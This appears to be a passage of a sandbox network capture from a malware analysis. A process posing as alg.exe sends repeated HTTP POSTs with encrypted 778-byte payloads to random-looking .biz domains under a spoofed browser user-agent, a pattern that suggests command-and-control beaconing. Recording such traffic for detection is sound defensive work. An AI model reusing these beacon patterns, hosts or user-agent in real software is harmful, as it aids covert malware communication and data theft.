                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=1bc53fe4039cec4975682bf37f136db6|155.94.241.188|1730130756|1730130756|0|1|0; path=/; domain=.qcrsp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
114 | 192.168.2.5 | 59990 | 44.221.84.105 | 80 | 2636 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:37.032885075 CET | 346 | OUT | POST /ml HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sewlqwcd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:37.032885075 CET | 778 | OUT | Data Raw: 72 10 5a 7b c6 cb 3a e4 fe 02 00 00 8b 9b 9b d2 45 ec 62 76 22 29 9a ee d4 a0 94 a6 2b 4f 62 fd f7 bc d5 30 8c dc 1d 18 67 06 b0 01 1a 30 42 f0 6b d7 8e 3f 68 d3 52 f2 d3 9d 8d cf 4a 69 83 24 91 6d 41 c1 7d d9 30 a3 0a 4d b1 35 7f 94 76 94 05 5c
Data Ascii: rZ{:Ebv")+Ob0g0Bk?hRJi$mA}0M5v\\"WC*?.-j"%,.M^Uo$I;=wMYC"t*uqmo7l)@_e%\FDQ#WVq:)<6R]"{cNNW!]VKAa:~^
Oct 28, 2024 16:52:37.722570896 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e99d1d698482b47a0b10394928eb1bc1|155.94.241.188|1730130757|1730130757|0|1|0; path=/; domain=.sewlqwcd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
115 | 192.168.2.5 | 59991 | 54.244.188.177 | 80 | 2636 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:37.744014025 CET | 352 | OUT | POST /mxtehtsjbw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dyjdrp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:37.744014025 CET | 778 | OUT | Data Raw: 69 31 0b 99 90 f6 4f 51 fe 02 00 00 76 21 d1 8e 58 6c c4 97 e5 77 fb 03 6e 0a f3 ee a9 a4 d0 89 e6 ee 82 7c 27 72 28 6b ce 6d 0a a0 a7 37 c7 49 ad 03 a8 33 e4 f2 f6 c8 d8 a6 49 d2 83 92 33 81 ef 67 4e 81 c1 e1 24 9e e6 34 8e 43 22 2d 1c a3 8f d7
Data Ascii: i1OQv!Xlwn|'r(km7I3I3gN$4C"-7R}"ck(T%2*3BR?f2v,:@lb*3&Vuazb7(3[e:BF%f{;S`]C1$:4B's+mvv9.MQ08#1-
Oct 28, 2024 16:52:38.610407114 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=edba2fe0c7bedb5f7bc25d236ef8016e|155.94.241.188|1730130758|1730130758|0|1|0; path=/; domain=.dyjdrp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
116 | 192.168.2.5 | 59992 | 35.164.78.200 | 80 | 2636 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:38.659461021 CET | 349 | OUT | POST /mcjaqbne HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: napws.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:38.659503937 CET | 778 | OUT | Data Raw: c7 b0 bc 35 1e d3 19 07 fe 02 00 00 a9 d2 d0 fe 15 d1 76 9b 5b 3b ea c5 5a de 73 b8 05 e4 b8 27 3a 11 63 95 0c 99 cb 6f ac 68 6c aa 78 6e f0 cc 57 82 39 93 a4 a0 c2 a2 49 48 39 b4 42 c2 18 b6 bb f0 1c fb 24 6b 1a 96 45 76 0c cc 3c 74 21 f4 a9 78
Data Ascii: 5v[;Zs':cohlxnW9IH9B$kEv<t!x8a=H?$@)I.p!|cpI:NuD<8XZZk8t8zhD9}Q}K[RuVYg@n@i.a_vW(NE@.5}x
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.470838070 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=ea97f3e585aa56c7ffcafa8c59e966ba|155.94.241.188|1730130759|1730130759|0|1|0; path=/; domain=.napws.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.5 | 59993 | 54.244.188.177 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:39.582664013 CET | 360 | OUT | POST /jpwoteajscxojhae HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qvuhsaqa.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:39.582695007 CET | 778 | OUT | Data Raw: ef 4f e7 a7 bb b0 af ca fe 02 00 00 15 52 46 2e fe 14 6f c7 44 c6 ec 84 3d 3d f6 4f a8 ae 4b 45 42 f7 8f 4e f1 46 57 56 84 d7 f6 83 cc 0f 63 2f c6 be 3b 78 c1 ad 60 05 8e 26 8b e5 98 73 01 16 72 df 5a 94 f7 d0 92 43 b4 9c 3f 91 75 78 7c 80 8e 0c
Data Ascii: ORF.oD==OKEBNFWVc/;x`&srZC?ux|SK,}"#KwRFE,e1J:{3,BgRiD<3xGW,D$e8JgE8xV|_K"on?$GQ`%hFf
Oct 28, 2024 16:52:40.422995090 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d39ca0424fe97c2ea8d7170dd4347136|155.94.241.188|1730130760|1730130760|0|1|0; path=/; domain=.qvuhsaqa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.5 | 59994 | 34.211.97.45 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:40.443310022 CET | 350 | OUT | POST /mlvudlfi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: apzzls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:52:40.443371058 CET | 778 | OUT | Data Raw: e7 3c 5b 59 41 0c 93 fa fe 02 00 00 c7 fa 29 5b a3 09 18 63 8a 74 c0 ef 7b ca c8 e8 26 54 a1 15 66 6c f1 0b 28 f9 ba 5e de 3d 89 d5 5b 0d c5 a3 1d 6e 44 cd c2 d3 e4 11 3a 2e c8 7b f7 d3 ca 56 ab 92 a8 e0 3b f5 f8 b5 5f 05 31 85 94 4c 20 ed 2b 31
Data Ascii: <[YA)[ct{&Tfl(^=[nD:.{V;_1L +1"FP4*nvz0he-pN[iPx%j2FRHw5yaF@[Pb%HL)*A8cA^-X@:S].}7T&pk2ll>tF
Oct 28, 2024 16:52:41.272118092 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:52:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2084d3f38fed8286e7ce30c8a9add624|155.94.241.188|1730130761|1730130761|0|1|0; path=/; domain=.apzzls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  119192.168.2.55999547.129.31.212802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.294508934 CET354OUTPOST /icdmsrmds HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: krnsmlmvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.294543028 CET778OUTData Raw: a8 67 83 17 d4 a5 c7 8d fe 02 00 00 85 ff f8 5a 00 e6 e9 29 a5 95 26 0f 9d 91 8e 11 b1 90 88 aa 05 b3 6e e8 00 f0 5c 9c 0b 56 50 d0 95 49 aa 14 f6 4c 55 da 73 20 f1 dd ff 4e 1d d2 6c 67 db 76 8c 03 16 f0 d5 75 50 ec 4d 3f c5 7d b3 5d 05 ff 9b 76
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: gZ)&n\VPILUs NlgvuPM?}]vWw6KuBFHw[S\,Vh?Nws>h>B]5VUE(n]j7GmSj*3aF:`ce!}m?>da0
Oct 28, 2024 16:52:42.713582993 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=89c218574366bd47e50c1328af618f4c|155.94.241.188|1730130762|1730130762|0|1|0; path=/; domain=.krnsmlmvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.5 | 59996 | 54.244.188.177 | 80 | 2636 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:42.735892057 CET | 345 | OUT | POST /n HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: nlscndwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:42.735919952 CET | 778 | OUT | Data Raw: 31 01 a4 32 18 e8 5e fb fe 02 00 00 f7 86 31 f6 bd 02 c4 a6 78 98 97 6c cb fe eb a6 d4 07 81 43 af 9a 39 c1 29 91 28 b2 da c8 ee 49 f4 cb 5a 19 c2 fc 76 47 e3 5f ea 94 b2 b2 a3 1f d7 75 d3 99 62 cf 0a 08 9d fb 12 d8 c9 c6 64 17 c3 ec c0 08 3f 3e
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 12^1xlC9)(IZvG_ubd?>"cgQL1!wG1]:=_MA9V lK>WC&,!^~ f:p>@23PD8TAK3G^t
Oct 28, 2024 16:52:43.565865993 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=30f223389e1fadeed229f1d1a431deb0|155.94.241.188|1730130763|1730130763|0|1|0; path=/; domain=.nlscndwp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
121 | 192.168.2.5 | 59997 | 3.94.10.34 | 80 | 2636 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:43.679754019 CET | 354 | OUT | POST /lhdfgbabu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: bzkysubds.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:43.679774046 CET | 778 | OUT | Data Raw: 28 d7 15 ae 57 b0 95 43 fe 02 00 00 6c 0a 42 65 b9 0c 3d 06 a0 85 70 b8 8d 46 65 60 eb 96 35 8c d3 97 1d 75 36 14 46 7f 99 85 2d 8f 20 83 6f 59 60 7f 28 73 1f e5 19 32 fa 33 93 24 5d b9 a9 50 3b 4f 64 e5 23 05 dd 6a 8a de ed ed 67 01 a8 37 d6 94
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: (WClBe=pFe`5u6F- oY`(s23$]P;Od#jg7.5D{m\5s'tQ;D.1P\Tpfh+NA |wiNHIZ6pL]\E{DsJPB[/t}x2dxb8oaQ_i0!F:q.S
Oct 28, 2024 16:52:44.343225956 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=39284023ea0fffa8c73ce7f1f9e57492|155.94.241.188|1730130764|1730130764|0|1|0; path=/; domain=.bzkysubds.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
122 | 192.168.2.5 | 59998 | 18.208.156.248 | 80 | 2636 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:44.377974987 CET | 356 | OUT | POST /qscftkkkcjjor HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ltpqsnu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:44.378000975 CET | 778 | OUT | Data Raw: ec 32 43 d6 78 70 23 a5 fe 02 00 00 ae 63 4c a1 df 6c 87 64 e2 1a b7 11 c0 a2 b2 18 9c b4 ec 4b 3f 65 26 66 b4 5e d8 e2 12 b2 0d d3 6a 9a 0e 4f 63 61 4b 35 6e 25 80 76 88 3a 60 44 7f 9f 26 a6 3f 1f ae 7c 38 a9 78 87 ae d4 34 6b 70 ef bb ba ee 5e
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 2Cxp#cLldK?e&f^jOcaK5n%v:`D&?|8x4kp^Rz[lz~E"1H)|vs9m{1'=^rmV(Jfvbw%~!`mjgbb$2=np25Cksv4Ic!_U
Oct 28, 2024 16:52:45.037393093 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=4ff85c967e2d753a629cb505957f1b83|155.94.241.188|1730130764|1730130764|0|1|0; path=/; domain=.ltpqsnu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
123 | 192.168.2.5 | 59999 | 18.246.231.120 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:45.059422016 CET | 344 | OUT | POST /bsw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: vnvbt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:45.059459925 CET | 778 | OUT | Data Raw: b2 89 39 fe e3 86 da 98 fe 02 00 00 ba 79 70 fe 5f b4 56 4d 37 fb 10 a6 1b 3e bd dd 0e e2 9d 2e 6a 39 a4 f0 2b a4 38 83 65 49 37 d3 67 2d ab 9d f7 af 72 58 56 d3 ef 46 e9 a2 9a 71 52 7d 29 a0 8a f0 76 96 07 62 25 18 c1 c0 30 54 a1 77 40 3e 10 5c
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 9yp_VM7>.j9+8eI7g-rXVFqR})vb%0Tw@>\Uo>WAy}S\juxZYtrieMxunNB#]KdZ2+zRNcJ`|O.4L)apJy8O|@PCDyWCx9~-=$bp
Oct 28, 2024 16:52:45.892080069 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=c0371f6fad110df6016a8e69cdfda9ba|155.94.241.188|1730130765|1730130765|0|1|0; path=/; domain=.vnvbt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
124 | 192.168.2.5 | 60000 | 3.94.10.34 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:45.919753075 CET | 354 | OUT | POST /grbkwbsae HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ypituyqsq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:45.919776917 CET | 778 | OUT | Data Raw: a8 7a e4 b1 1e 8b 95 37 fe 02 00 00 ee a6 7b 53 ed 8f 98 7f 93 77 4f e8 08 c3 a1 8c 09 58 29 a6 16 23 45 52 a4 14 16 6f bb 70 36 9c a0 7d 22 c6 76 6f 37 aa d4 d7 05 75 7d 28 5b 7d 2b 80 19 34 c6 f1 4d 13 45 0f 23 8f aa 78 d5 74 d1 f5 83 5a 94 9f
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: z7{SwOX)#ERop6}"vo7u}([}+4ME#xtZ,37ww}ZT`]Q'+/y8`c3^(]W/[hw+1.RMcn4uv3]1!JXfsAW00N0p;2NvVZ/H#RL
Oct 28, 2024 16:52:46.585510969 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=380cf4c1db9551d28cb8e0e3f9e02a49|155.94.241.188|1730130766|1730130766|0|1|0; path=/; domain=.ypituyqsq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
125 | 192.168.2.5 | 60001 | 35.164.78.200 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:52:46.612720013 CET | 359 | OUT | POST /vlwdbxkbnakykkgr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ijnmvqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:52:46.612736940 CET | 778 | OUT | Data Raw: 9f 9c 95 ce e8 b6 aa a5 fe 02 00 00 05 3f 9e 45 4b 8f 95 db 8d 3d ed 86 f6 4b 84 15 f9 4d 4b db 80 55 09 44 c3 25 b5 34 3b 0a 90 61 66 46 a6 a8 09 31 a0 6b 8c 83 80 22 ad a8 f3 84 24 9a 94 c3 e9 27 df ad 72 36 b1 7b e5 7c 84 c5 bc 33 0c 21 4b 76
